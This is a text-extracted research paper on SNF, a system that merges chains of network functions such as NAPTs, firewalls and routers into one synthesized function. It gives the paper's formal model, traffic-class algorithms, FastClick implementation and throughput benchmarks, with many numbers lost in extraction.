we employed the symmetric receive side scaling (rss) (intel) scheme by woo & park to hash input traffic in a way that a flow's bi-directional packets are always served by the same snf rewriter, hence by the same processor. this scheme allows a core to process a tcu at the maximum processing speed of the machine. main objectives the primary goal of snf is to eliminate redundancy along the chain. the sources of redundancy in current nf chains, and the solutions that our approach offers, are:
this allows grouping packets into a data structure that we call a packet filter, defined as a logical expression of the form: φ={(p ,...,pn)∈p|(p ∈f )∧...∧(pn∈fn)} where (f ,...,fn) are field filters. the space of all possible packet filters is . then: u : { φ → (f ,...,fn) → {(f ,...,fn)|∀i,fi}(f ,...,fn) is a bijection and we can assimilate φ to (f ,...,fn). if φ and φ are two packet filters defined by their field filters (f , ,...,f ,n) and (f , ,...,f ,n), then φ ∩φ is also a packet filter and is defined as (f , ∩f , ,...,f ,n∩f ,n). network function representation network functions typically apply read and write operations to traffic. while our packet unit representation allows us to compose complex read operations across the entire header space, we still need the means to modify traffic. for this, we define an operation as a function ω :p → that associates a set of possible outputs to a packet. we add the additional constraint that for any given operation ω, there is ω ,...,ωn∈nn such as: ∀p=(p ,...,pn)∈p,ω(p)=(ω (p ),...,ωn(pn)). note that we use sets of possible values (instead of fixed values) to model cases where the actual value is chosen at run-time (e.g., source port in an s-nat). therefore, snf supports both deterministic and conditional operations. if we define � as the space of all possible operations, we can express a processing unit pu as a conditional function that maps packet filters to operations: pu :p →   ω (p) if p∈φ ... ωm(p) if p∈φm where (ω ,...,ωm)∈�m are operations and (φ ,...,φm)∈ m are mutually distinct packet filters. an nf is simply a dag of pus. for instance, snf can express a simplified router’s nf as follows: nfrouter :pu{lookup}→pu{decipttl}→pu{ipchecksum}→pu{mac} with pus: an ip lookup pu is followed by decrement ip ttl, ip checksum update, and source and destination mac address modification pus. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the synthesized network function in the previous section we laid the foundation to construct nfs as graphs of pus. now, at the service level where multiple nfs can be chained, we define a tcu as a set of packets, represented by disjoint unions of packet filters, that are processed in the same fashion (i.e., undergo the same set of synthesized operations). this definition allows us to construct the service chain’s synthesizednf function as a dag of pus, or equivalently, as a map of tcus that associates operations to their packet filters: synthesizednf : →� formally, the complexity of the synthesizednf is upper-bounded by the function o(n·m), where n is the number of tcus and m is the number of packet filters (or conditions) per tcu. each tcu turns a textual packet filter specification (such as ‘‘proto tcp && dst net . / && src port ’’) into a binary decision tree traversed by each packet. therefore, in the worst case, an input packet might traverse a skewed binary tree of the last tcu, yielding the above complexity bound. the average case occurs in a relatively balanced tree (o(logm)), in which case the average complexity of the synthesizednf is bounded by the function o(n·logm). synthesis steps leveraging the abstractions introduced in the ‘abstract service chain representation’ section we detail the steps that translate a set of nfs into an equivalent snf. the snf architecture is comprised of three modules (shown in fig. ). we describe each module in the following sections. service chain configurator the top left box in fig. 
is the service chain configurator; the interface that a network operator uses to specify a service chain to be synthesized by snf. two inputs are required: a set of service components (i.e., nfs), along with their topology. snf abstracts packet processing by using graph theory: a chain is described as a dag of interconnected nfs (the chain-level dag), where each nf is itself a dag of abstract packet-processing elements (the nf dag). the nf dag is implementation-agnostic, similar to the approaches of bremler-barr, harchol & hay, anwer et al., and kohler et al. the network operator enters these inputs in a configuration file using the following notation:
vertices (nfs): each service component (i.e., an nf) of a chain is a vertex in the chain-level dag, for which the service chain configurator expects a name and an nf dag specification (see fig. ). each nf can have any number of input and output ports as specified by its dag. an nf with one input and one output interface is denoted as: [interface ]nf [interface ].
edges (nf inter-connections): the connections between nfs are the edges of the chain-level dag. we interconnect two nfs as follows: nf [interface ]→[interface ]nf .
no loops: since the chain-level dag is acyclic by construction, snf must prevent loops (e.g., two interfaces of the same nf cannot be connected to each other).
entry points: in addition to the internal connections within a chain (i.e., connections between nfs), the service chain configurator also requires the entry points of the chain.
readframe is an i/o element, stripethernetheader is a parsing element (moves a frame’s pointer), iploookup is a read element, while decrementipttl is a write element. the parser stitches together all the nf dags based on the topology graph and builds a synthesized-dag (see fig. ) that represents the entire chain. this process begins from an entry point and searches recursively until an output element is found. if the output element leads to another nf, the parser keeps a jump pointer and cross checks that the encountered interfaces match the interfaces declared in the service chain configurator. after collecting this information, the parser omits the i/o elements because one of snf’s objectives is to eliminate inter-nf i/o interactions. the process continues until an output element that is not in the topology is found; such an element can only be an end-point. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. along the path to an output element the parser separates the read from the write elements and transforms nf elements into pus, according to the ‘network function representation’ section. next, the parser considers the next entry point until all are exhausted. the final output of the service chain parser is a large synthesized-dag of pus that models the behavior of the entire input service chain. service chain synthesizer after building the synthesized-dag, our next target is to create the synthesizednf introduced in ‘the synthesized network function’ section. to do so, we need to derive the snf’s tcus. to build a tcu we execute the following steps: from each entry port of the synthesized-dag, we start from the identity tcu tcu ∈ ×� defined as: tcu =(p,idp), where idp is the identity function of p, i.e.,∀x ∈p,idp(x)=x. conceptually, tcu represents an empty packet filter and no operations, which is equivalent to a transparent nf. then, we search the synthesized-dag, while updating our tcu as we encounter conditional (read) or modification (write) elements. algorithms and build the tcus using an adapted depth-first search (dfs) of the synthesized-dag. now let us consider a tcu t, defined by its packet filter φ and its operation ω, that traverses a pu u using the adapted dfs. the traverse function in algorithm creates a new tcu for each possible pair of (ωi,φi). in particular, it creates a new packet filter φ′ returned by the intersect function (line ). this function is described in algorithm and considers previous write operations while updating a packet filter. for each field filter φi of a packet filter, the function checks whether the value has been modified by the corresponding ωi operation (condition in line ) and whether the written value is in the intersecting field filter φ i (line ). it then updates the tcu by intersecting it with the new filter, if the value has not been modified (action in line ). after the intersect function returns in algorithm , traverse creates a new operation by composing ω and ωi (line ). the recursive algorithm terminates in two cases: (i) when the packet filter of the current tcu is the empty set, in which case the function does not return anything, (ii) when the pu u does not have any successors, in which case it returns the current tcus. in the latter case, the returned tcus comprise the final synthesizednf function. 
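Before the formal listings that follow, a compact, runnable sketch of this traversal may help. Here packets are reduced to tuples over small finite field domains, write operations are simplified to per-field constant rewrites (with ID marking an untouched field), and all names are illustrative rather than taken from the C++ SNF implementation.

    # Runnable sketch of the TCU-building DFS described above (the formal
    # listings follow). This is an illustration, not the SNF code.
    ID = None   # marker: field not modified so far

    def compose(later, earlier):
        """Compose per-field writes: the later (re)write of a field wins."""
        return tuple(l if l is not ID else e for l, e in zip(later, earlier))

    def intersect(pkt_filter, write_op, cond):
        """Intersect a TCU's packet filter with a PU condition, taking fields
        that were already rewritten into account."""
        out = []
        for field_set, written, cond_set in zip(pkt_filter, write_op, cond):
            if written is ID:
                out.append(field_set & cond_set)   # plain field-filter intersection
            elif written in cond_set:
                out.append(field_set)              # rewritten value always matches
            else:
                out.append(set())                  # rewritten value never matches
        return tuple(out)

    def traverse(dag, node, pkt_filter, write_op, tcus):
        """Adapted depth-first search that accumulates the chain's TCUs."""
        if any(not f for f in pkt_filter):
            return                                 # empty traffic class: prune branch
        if node not in dag:                        # no successors: emit a final TCU
            tcus.append((pkt_filter, write_op))
            return
        for cond, op, succ in dag[node]:           # (condition, write, successor PU)
            traverse(dag, succ,
                     intersect(pkt_filter, write_op, cond),
                     compose(op, write_op), tcus)

    # toy chain over two header fields (protocol, destination port)
    dag = {"classify": [(({"udp"}, set(range(1, 1024))), (ID, ID), "rewrite")],
           "rewrite":  [(({"udp", "tcp"}, set(range(0, 65536))), (ID, 53), "out")]}
    tcus = []
    traverse(dag, "classify", ({"udp", "tcp"}, set(range(0, 65536))), (ID, ID), tcus)
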
Algorithm 1: Building the SNF TCUs
    1: function TRAVERSE(t = (φ, ω), u = {(φ_i, ω_i)}_(i ≤ m))
    2:   for i ∈ (1, m) do
    3:     φ′ ← INTERSECT(t, φ_i)
    4:     ω′ ← ω_i ∘ ω
    5:     t′ = (φ′, ω′)
    6:     TRAVERSE(t′, u.successors[i])

Algorithm 2: Intersecting a TCU with a filter
    1: function INTERSECT(t = (φ, ω), φ°)
    2:   φ′ ← P
    3:   (ω_1, ..., ω_n) ← ω.coordinates
    4:   (φ_1, ..., φ_n) ← φ.coordinates
    5:   (φ°_1, ..., φ°_n) ← φ°.coordinates
    6:   (φ′_1, ..., φ′_n) ← φ′.coordinates
    7:   for i ∈ (1, n) do
    8:     if ω_i = id then φ′_i ← φ_i ∩ φ°_i
    9:     else
    10:      if ω_i(φ_i) ⊂ φ°_i then φ′_i ← φ_i
    11:      else φ′_i ← ∅
    12:  return φ′

Managing stateful functions
A difficulty when synthesizing NF chains is managing successive stateful functions. It is crucial to ensure that the states are properly located in a synthesized NF and that every packet is matched against the correct state table. At the same time, SNF should hold the promise that NFV service chains must be realized without redundancy, hence single-read and single-write operations must be applied per packet. To highlight the challenges of maintaining state in a chain of NFs, consider the example topology shown in Fig. . In this example, a large network operator has run out of private IPv addresses in the . / prefix and has been forced to share the same network prefix between two distinct zones (i.e., zones and ), using a chain of NAPTs. This is not unlikely to happen, as an -bit network prefix contains less than million addresses and recent surveys have predicted that billion devices will be connected to the internet by (Evans, ). Consolidating this chain of NFs into a single SNF instance poses a problem. That is, traffic originating from zones and shares the same source IP address and port range, but to ensure that all the traffic is translated properly, the corresponding synthesized chains must share their NAPT table. However, since this traffic also shares the same destination prefix (i.e., towards the same internet gateway), a host from the outside world cannot possibly distinguish the zone from which the traffic originates. Obviously, the question that SNF has to address in general, and particularly in this example, is: ''How can we synthesize a chain of NFs, ensuring that (i) traffic mappings are unique and (ii) no redundant operations will be applied?'' To solve this conundrum, the SNF design respects the following properties:

Property 1: We enforce the uniqueness of flow mappings by ensuring that all egress traffic that shares the same last stateful (re)write operation also shares the same state table.

Figure: Example of stateful NAPT chains, where two zones share the same IPv prefix.
Figure: State management in SNF (one stateful rewrite element per egress interface, fed by classifiers on the ingress interfaces).

Property 2: The state table of SNF must be origin-aware. To redirect ingress traffic towards the correct interface, while respecting the single-read principle of SNF, the SNF state table must collocate flow information and the origin interface for each flow.

To generalize the state management problem, Fig. shows how SNF handles stateful configurations with three egress interfaces.
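As a concrete illustration of these two properties, the following sketch (Python, with hypothetical class and interface names; a heavy simplification of a real NAPT table) shows what an origin-aware state table per last stateful rewrite could look like:

    # Sketch of an origin-aware flow table: one stateful rewriter per egress
    # interface, each entry collocating the flow mapping and the interface the
    # flow originated from. Names are hypothetical; the reverse lookup is naive.
    class StatefulRewriter:
        def __init__(self, egress_iface):
            self.egress_iface = egress_iface
            self.table = {}          # original flow -> (translated flow, origin iface)

        def outbound(self, flow, origin_iface, translate):
            """Translate an outbound flow and remember where it entered the chain."""
            if flow not in self.table:
                self.table[flow] = (translate(flow), origin_iface)
            translated, _ = self.table[flow]
            return translated

        def inbound(self, translated_flow):
            """Map a returning flow back to its original header and to the origin
            interface it must be sent out of (a single lookup, no extra read)."""
            for original, (translated, origin_iface) in self.table.items():
                if translated == translated_flow:
                    return original, origin_iface
            return None

    # one rewriter (and hence one state table) per egress interface of the chain
    rewriters = {iface: StatefulRewriter(iface)
                 for iface in ("egress0", "egress1", "egress2")}
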
we apply ‘‘property ’’ by having exactly one stateful (re)write element (denoted as stateful rw) per egress interface. we apply ‘‘property ’’ by having one input port in each of these (re)write elements, associated with an ingress interface. therefore, a state table in snf not only contains flow-related information, but also links a flow entry with its origin interface. a motivating use case to understand how snf works and what benefits it can offer, we quantify the processing and i/o redundancies in an example use case of an nf chain and then compare it to its synthesized counterpart. we use click to specify the nf dags of this example, but snf is applicable to other frameworks. the example chain consists of a napt, a layer firewall (fw), and a layer load balancer (lb) that process transmission control protocol (tcp) and user datagram protocol (udp) traffic as shown in fig. . the tcp traffic is napt’ed in the first nf and then leaves the chain, while udp is filtered at the fw (the second nf) and the udp datagrams with destination port are katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nf - napt readframe . . . strip ethernet header destination ip lookup . . / → . / → . . . / → read ip address decrement ip ttl ip fragmentation mtu bytes rewrite flow udp->ip_src . . . , port_src - tcp->ip_dst . . . ) encapsulate ethernet src:mac , dst:mac strip ethernet header decrement ip ttl ip fragmentation mtu bytes filter ip traffic allow src ip . . . && udp_dst port , drop the rest encapsulate ethernet src:mac , dst:mac strip ethernet header decrement ip ttl ip fragmentation mtu bytes rewrite flow apply round-robin (rr) to dst ip addresses . . . , . . . encapsulate ethernet src:mac , dst:mac nf - l fw nf - l lb writeframe classify ip traffic udp, tcp, drop readframe . . . writeframe writeframe readframe . . . domain . / domain . / figure the internal components of an example napt - l fw - l lb chain. load balanced across two servers by the last nf. for simplicity, we discuss only the traffic going in the direction from the napt to the lb. the rectangular operations in fig. are interface-dependent, e.g., an ‘‘encapsulate ethernet’’ operation encapsulates the ip packets in ethernet frames before passing them to the next nf where a ‘‘strip ethernet header’’ operation turns them back into ip packets. such operations occur times because there are nfs, instead of only once (because the processing operates at the ip layer). ideally, strip should be applied before, and ethernet encapsulation after all of the ip processing operations. similarly, the ‘‘ip fragmentation’’ should only be applied before the final ethernet encapsulation. the remaining operations (illustrated as rounded rectangles) of the three processing stages are those that (i) make decisions based upon the contents of specific packet fields (read operations with a solid round outline, e.g., ‘‘classify ip traffic’’ and ‘‘filter ip traffic’’) or katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. rewrite flow ip_dst: . . . classify ip traffic ● rewrite a traffic class at once. ● keep state. strip ethernet header encapsulate ethernet src:mac ,dst:mac readframe . . . writeframe to . / early discard rewrite flow synthesized read operations synthesized write operations udp dst tcp all ip_src: . . . , ip_dst: rr( . . . / . . . ), port_src: - ip fragmentation mtu bytes a unique set of header fields for each traffic class. 
x decrement ip ttl ip/udp checksum once ip checksum once x decrement ip ttl packets to be dropped pass only through the read stage. encapsulate ethernet src:mac ,dst:mac writeframe to . / ip fragmentation mtu bytes figure the synthesized chain equivalent to fig. . the snf contributions are shown in floating text. (ii) modify the packet header (rewrite operations with a blue dashed outline e.g., ‘‘rewrite flow’’ and ‘‘decrement ip ttl’’). we found redundancy in both types of operations. in the read operations, one ip classifier is sufficient to accommodate the three traffic classes of this example and perform the routing. thus, all the round-outlined operations with solid lines (green) can be replaced by a single ‘‘classify ip traffic’’ operation. large savings are also possible with the rewrite operations. for example, the initial chain calculates the ttl field times and ip checksum times, whereas only one computation for these fields suffices in the synthesized chain. based on our measurements on an intel xeon e processor the checksum calculations cost – cpu cycles/packet. by integrating the ‘‘decrement ip ttl’’ into the ‘‘rewrite flow’’ operation and enforcing the checksum calculation only once, saves cpu cycles/packet. figure depicts a synthesized version of the nf chain shown in fig. . following the snf paradigm presented in the ‘snf architecture’ section, the synthesized chain forms a graph with two main parts. the left-most part (rounded rectangles with solid outline in fig. ) encodes all the read operations by composing paths that begin from a specific interface and traverse the three traffic classes of this chain, until a packet is output or dropped. each path keeps a union of filters that represents the header space that matches the respective traffic class. in this example, the filter for e.g., the allowed udp packets is the union of the protocol and destination port numbers. such a filter is part of a classifier whose output port is linked with a set of write operations (dashed vertices in fig. ) associated with this traffic class (right-most part of the graph). as shown in fig. , with snf a packet passes through all the read operations once (guaranteeing a single-read) and either the packet is discarded early or each header field is written once (ensuring a single-write) before exiting the chain. synthesizing the counterpart of this example implies several code modifications to avoid the redundancy caused by the design of each nf. to apply a per flow, per-field single-write operation we ensure that the ‘‘rewrite flow’’ will only calculate the checksums once ip addresses, ports, and the ip ttl fields are written. therefore, in this example we saved four unnecessary operations ( ‘‘decrement ip ttl’’ and ‘‘rewrite flow’’) and four checksum katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. calculations ( ip and ip/udp). moreover, integrating all decisions (i.e., routing and filtering) in one classifier caused the classifier to be slightly heavier, but saved another two redundant function calls to ‘‘destination ip lookup’’ and ‘‘filter ip traffic’’ respectively. the final form of the synthesized chain requires only processing operations to transfer the udp datagrams along the entire chain. the initial chain implements the same functionality using processing operations and two additional pairs of i/o operations. 
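The single-write discipline behind these savings can be sketched as follows (Python pseudocode with invented field names and a toy checksum helper, not FastClick code): all header writes accumulated for a traffic class are applied once, the chain's TTL decrements are folded into a single subtraction, and the IP/UDP checksums are computed only after every field has been written.

    # Illustration of the single-write idea: merged header writes, one folded
    # TTL decrement, and checksums computed once at the end.
    def toy_checksum(packet, layer):
        """Stand-in for a real ones'-complement checksum over the given layer."""
        fields = [v for k, v in sorted(packet.items())
                  if k.startswith(layer + ".") and not k.endswith("checksum")]
        return sum(hash(v) & 0xFFFF for v in fields) & 0xFFFF

    def apply_synthesized_writes(packet, writes, ttl_decrements):
        for field, value in writes.items():           # one write per header field
            packet[field] = value
        packet["ip.ttl"] -= ttl_decrements            # all TTL decrements folded into one
        packet["ip.checksum"] = toy_checksum(packet, "ip")    # computed once
        packet["udp.checksum"] = toy_checksum(packet, "udp")  # computed once
        return packet

    pkt = {"ip.src": "10.0.0.1", "ip.dst": "10.0.0.9", "ip.ttl": 64,
           "ip.checksum": 0, "udp.sport": 5000, "udp.dport": 53, "udp.checksum": 0}
    apply_synthesized_writes(pkt, {"ip.src": "198.51.100.1", "udp.sport": 6000},
                             ttl_decrements=3)
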
based on our measurements the total processing cost of the initial chain is cycles/packet, while the synthesized chain requires × less (roughly ) cycles/packet. if we account for the extra i/o cost per hop for the initial chain the difference becomes even greater. in production service chains, where packets arrive at high rates, this overhead can play a major role in limiting the throughput of the chain and the imposed latency; therefore, the advantages of synthesizing more complex service chains than this simple use case are expected to be even greater. implementation as we stated earlier, snf’s basic assumption is that each input service component (i.e., nf) is expressed as a graph (i.e., the nf dag), composed of individual packet processing elements. this allows snf to parse the nf dag and infer the internal operations of each nf, producing a synthesized equivalent. among the several candidate platforms that allow such a representation, we developed our prototype atop click because it is the most widely used nfv platform in the academia. many earlier efforts built upon it to improve its performance and scalability, hence we believe that this choice will maximize snf’s impact as it allows direct comparison with state of the art click variants such as routebricks (dobrescu et al., ), packetshader (han et al., ), double-click (kim et al., ), snap (sun & ricci, ), clickos (martins et al., ), and fastclick (barbette, soldani & mathy, ). we adopt fastclick as the basis of snf as it uses dpdk, a state of the art user-space i/o framework that exploits modern hardware amenities (including multiple cpu cores) and nic features (including multiple queues and offloading mechanisms). along with batch processing, non-uniform memory access support, and fine grained cpu core affinity techniques, fastclick can realize a single router achieving line-rate throughput at gbps. snf aims for similar performance for an entire service chain. fastclick extensions we implemented snf in c++ . the modules depicted in fig. are , lines of code. the integration with fastclick required another , lines of code (modifications and extensions). although fastclick improves a router’s throughput and latency, it lacks features required for broader nfv applications; therefore, we made the following extensions to target a service-oriented platform: extension : stateful elements that deal with flow processing such as ip/udp/tcprewriter were not originally equipped with fastclick’s accelerations such as computational batching or cache prefetching. moreover, these elements were not designed to be thread-safe, hence they could cause race conditions when accessed by multiple cpu cores at the same time. we katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this extension is not a direct part of fastclick, since the compressed classification rules are computed by snf beforehand; then, snf uses these rules as arguments when calling fastclick’s classifier or ipclassifer elements. designed thread-safe data structures for these elements, while also applying the necessary modifications to equip them with the fastclick accelerations. extension : we tailored several packet modification fastclick elements to comply with the synthesis principles, as we found that their implementation was not aligned with our single-write approach. for instance, we improved the ip/udp/tcp checksum calculations by calling the respective functions only once all the header field modifications are applied. 
moreover, we extended the ip/udp/tcprewriter elements with additional input arguments. these arguments extend the elements’ packet modification capabilities (e.g., decrement ip ttl field to avoid unnecessary element calls) and guarantee that a packet entering these elements undergo a single-write operation per header field. extension : we developed a new element, called ipsynthesizer, in the heart of our execution model shown in fig. . this element implements per-core stateful flow tables that can be safely accessed in parallel allowing multiple tcus to be processed at the same time. to avoid inter-core communication, thus keeping the per-core cache(s) hot, we extended the rss mechanism of dpdk (see fig. ) using a symmetric approach proposed by woo & park ( ). extension : to make software-based classification more scalable, we implemented the lazy subtraction algorithm introduced in header space analysis (hsa) (kazemian, varghese & mckeown, ). with this extension, snf aggregates common ip prefixes in a filter and applies the longest one while building a tcu, thus producing shorter traffic class expressions. our prototype supports a large variety of packet processing libraries, fully covering both native fastclick and hypervisor-based clickos deployments. our prototype also takes advantage of fastclick’s computation batching with a processing core moving a group of packets between the classifier and the synthesizer with a single function call. new packet processing elements can be incorporated with minor effort. we made the fastclick extensions available at katsikas ( ). performance evaluation recent efforts, such as clickos (martins et al., ) and netvm (hwang, ramakrishnan & wood, ), are unable to maintain constant high throughput and low latency for chains of more than nfs when processing packets at high speed. this problem hinders large-scale hypervisor-based nfv deployments that could reduce network operators’ expenses and provide more flexible network management and services (cisco, ; sdx central, ). we envision snf to be the key component of future nfv deployments, thus we evaluate the synthesis process using real service chains to exercise its true potential. in this section, we demonstrate snf’s ability to address three types of service chains: chain : scale a long series of routers at the cost of a single router. chain : nest multiple napt middleboxes. chain : implement high performance acls of increasing cardinality at the borders of isp networks. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we use the experimental setup described in the ‘testbed’ section to measure the performance of the above three types of chains and answer the following questions: can we synthesize (stateful) chains without sacrificing throughput as we increase the chain length (see the ‘a chain of routers at the cost of one’ section and the ‘stateful service chaining’ section)? what is the effect of different packet sizes on a system’s throughput (see the ‘stateful service chaining’ section)? what are the current limits of purely software-based packet processing (see the ‘real service chain deployments’ section) and how can we overcome them (see the ‘hardware-accelerated snf’ section)? testbed we conducted our experiments on six identical machines each with a dual socket -core intel r© xeon r© cpu e - v clocked at . ghz. the cache sizes are: × kb l , kb l , and mb l . hyper-threading is disabled and the os is the ubuntu . . 
distribution with linux kernel v. . . each machine has two dual-port gbe intel es nics. unless stated otherwise, we use two machines to generate and sink bi-directional traffic using moongen (emmerich et al., ), a dpdk-based traffic generator. moongen allows us to saturate gbps nics on a single machine using a set of cores, while receiving the same amount of traffic on another set of cores. to gain insight into the performance of the service chains, we measure the throughput and end-to-end latency to traverse the chains, at the endpoints. we use fastclick as a baseline and compare fastclick against snf (which extends fastclick). we create service chains that run natively in a single process using rss and multiple cpu cores, as this is the fastest fastclick configuration. we follow two different setups for our software-based and hardware-assisted deployments as follows: software-based snf: in the ‘a chain of routers at the cost of one,’ ‘stateful service chaining,’ and ‘real service chain deployments’ sections we stress different purely software- based nfv service chains that run in one machine following the execution model of fig. . this machine has gbe nics connected to the two traffic source/sink machines (two nics on each machine), hence the total capacity of the nfv machine is gbps. the goal of this testbed is to show how much nfv processing fastclick and snf can fit into a single machine and what processing limits this machine has. hardware-assisted snf: for the complex nfv service chains, presented in the ‘real service chain deployments’ section, we deployed a testbed (see the ‘hardware-accelerated snf’ section) where we offload the traffic classification to a noviflow openflow switch with firmware version . . . the switch is connected to two gbe nics via each of the two senders/receivers, and with one link to each of the four processing servers in our snf cluster. this testbed has a total of gbps capacity (same as the software-based setup above), but the processing is distributed to more machines in order to show how our snf system scales. a chain of routers at the cost of one this first use case targets a direct comparison with the state of the art. specifically, we chain a popular implementation of a software-based router that, after several years of successful katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. t h ro u g h p u t (g b p s) number of chained nfs routers - snf (batch ) throughput(gbps):mean( . ),std( . ) napts - snf (batch ) throughput(gbps):mean( . ),std( . ) napts - snf (batch ) throughput(gbps)= - . ·nfs + . ,r = . routers - fastclick (batch ) throughput(gbps)=+ . ·nfs - . ·nfs+ . napts - fastclick (batch ) throughput(gbps)=+ . ·nfs - . ·nfs+ . figure throughput (gbps) of chained routers and napts using (i) fastclick and (ii) snf versus the numbers of chained nfs ( -byte frames are injected at gbps). bigger batch sizes achieve higher throughput. research contributions (dobrescu et al., ; han et al., ; kim et al., ; sun & ricci, ; martins et al., ; barbette, soldani & mathy, ), achieves scalable performance at tens of gbps. as we show in this section, a naive chaining of individual, fast nfs does not achieve high performance. to quantify this we linearly connect – fastclick routers, where each router has four gbps ports (hence such a chain has a gbps link capacity). the down-pointing (green) triangular points in fig. 
show the throughput achieved by these chains versus the increasing length of the chains, when we inject -bytes frames, excluding the cyclic redundant check (crc). the maximum throughput for this frame size is . gbps and this is the limit of our nics, as reported earlier (barbette, soldani & mathy, ). in our experiment, fastclick can operate at the maximum throughput only for a chain of or routers. as denoted by the equation’s fit to the graph, after this point there is a quadratic throughput degradation, that results in a chain of routers achieving less that gbps of throughput. snf automatically synthesizes this simple chain (shown with red squares) to achieve the maximum possible throughput of this hardware, despite the increasing length of the chain. the fitted equation confirms that snf operates at the speed of the nics. stateful service chaining the problem of service function chaining has been recently investigated by quinn & nadeau ( ) and several relevant use cases (liu et al., ) have been proposed. in some of these use cases, traffic needs to support distinct address families while traversing different networks. for instance, within an isp, ipv /ipv traffic might either be directed to a nat (bagnulo, matthews & van beijnum, ) or a carrier grade nat (perreault et al., ). in more extreme cases, this traffic might originate from different access networks, katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. t h ro u g h p u t (g b p s) frame size without crc (bytes) snf routers (batch ) snf napts (batch ) snf napts (batch ) fastclick routers (batch ) fastclick napts (batch ) figure throughput of routers and napts chained using (i) fastclick and (ii) snf versus the frame size in bytes (without crc). the different frames are injected at gbps. such as fixed broadband, mobile, datacenters, or cloud customer premises, thus causing the nested nat problem (penno, wing & boucadair, ). the goal of this use case is to test snf in such a stateful context using a chain of – napts. each napt maintains a state table that stores the original and translated source and destination ip addresses and ports of each flow, associated with the input interface where a flow was originated. the rhomboid points of fig. show that the chains of fastclick napts suffer a steeper (according to the fitted equation) quadratic degradation than the fastclick routers. although we extended fastclick to support thread-safe, parallelized napt operations across multiple cores, it is still unable to drive the napt chain at line-rate, despite using cpu cores and -packet batches. snf requires a certain batch size to realize the synthesized napt chains at the speed of hardware as shown by the black circles of fig. . the curve with the up-pointing (blue) triangles indicates that a batch size of packets leads to a slight throughput degradation after the th napt in the chain. state lookup and management operations executed for every packet cause this degradation. depending on the performance targets, a network operator might tolerate an increased latency to achieve the higher throughput offered by an increased batch size. next, we explore the effect of different frame sizes on the chains of routers and napts. we run the longest chain (i.e., nfs) for frame sizes in the range of [ , , ] bytes. figure shows that snf follows the nics’ performance and achieves line-rate forwarding at gbps for frames greater than bytes. 
fastclick only achieves up line-rate performance for frame sizes greater than – , bytes. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. router napt internet fw isp network . / inbound traffic outbound traffic intra-isp traffic figure an isp’s service chain that serves inbound and outbound internet traffic as well as intra-isp traffic using three nfs. real service chain deployments another common use case for an isp is to deploy a service chain of a fw, a router, and a napt as depicted in fig. . the fw of such a chain may contain thousands of rules in its acl causing serious performance issues for software-based nf implementations. in this section we measure the performance of snf using actual fw configurations of increasing cardinality and complexity, while exploring the limits of software-based packet processing on our hardware. we utilize a set of three actual acls (taylor & turner, ), taken from several isps, to deploy the service chain of fig. . the fw implements one acl with , , or , entries. the second nf is a standards-compliant ip router that redirects packets either towards the isp’s domain (intra-isp traffic with prefix . . . / ) or to the internet. for the latter traffic, the third nf interconnects the isp with the internet by performing source and destination napt. we use the above acls to generate traces of -byte frames that systematically exercise all of their entries. the generated packets emulate intra-isp, inbound and outbound internet traffic (see fig. ). figure presents the performance of the chains versus the different frames sizes ( , , , and , bytes). we implemented the chains in fastclick and a purely software-based snf using the full capacity of our processor’s socket (i.e., cores in one machine), symmetric rss, and a batch size of packets. figure a shows that the small acl ( rules), executed as a single fastclick instance, achieves satisfactory throughput, equal to its synthesized counterpart. this indicates that a small isp or a chain deployment in small subnets (e.g., using links with capacity equal or less than gbps) may not fully benefit from snf. as depicted in fig. b, the latency is also bounded below µs. this time is dominated by the fact that our traffic flows as follows: traffic originating from one machine enters an snf server and, after being processed, sent back to the origin server. we believe that the observed latency values are realistic for such a topology. however, for the acls with and , rules the combination of all possible traffic classes among the fw, router, and napt boxes causes the classification tree of the chain katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure system’s performance versus frame sizes ( , , , and , bytes) of three different isp-level chains with , , and , rules in their acls. fastclick and snf implement these chains in software using cpu cores (in a single machine with four nics), symmetric rss, and batch size of packets. input rates are gbps for the throughput test and gbps for the latency test. to explode in size, hence synthesis is a powerful yet necessary solution. this causes three problems for fastclick: (i) the throughput when executing the last two acls ( , and , rules) is reduced by almost . ×– × respectively (on average), (ii) the median latency of the largest acl is at least an order of magnitude greater than the median latencies of the smaller acls (see fig. 
b), and consequently (iii) the th percentile of the latency increases (up to almost ms). in contrast, snf effectively synthesizes the large acls (i.e., and , rules) maintaining high throughput despite their increasing complexity. in the case of rules, the synthesis is so effective that leads to better throughput than the -rule case. regarding latency, snf demonstrates . – × lower median latency (bounded below µs) and – . × lower latency variance (slightly above ms in some cases). the throughput gain of snf is up to . × greater than the fastclick chains. hardware-accelerated snf the results presented in the previous section show that software-based snf cannot handle packet processing at a high enough rate when the nfs are complex. we analyzed the root cause and concluded that the packet classifier (that dispatches incoming packets to synthesized nfs) is the bottleneck. to overcome this problem, we run additional experiments, in which we offload packet classification to a hardware openflow switch (since commodity nics do not offer sufficient programmability). by doing so, we showcase snf’s ability to scale to high data rates with realistic nfs. in addition, we hint at the performance that is potentially achievable by offloading packet classification to a programmable interface. throughput measurements this extended version of snf includes a script that converts the classification rules computed by the original snf to openflow . rules. the translation is not straightforward because the switch rules are less expressive than the rules accepted by the nfs. specifically, rules that match on tcp and udp port ranges are problematic. while openflow allows only matches on concrete values of ports, naive unrolling of ranges into multiple openflow katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure hardware-assisted snf’s performance versus frame sizes ( , , , and , 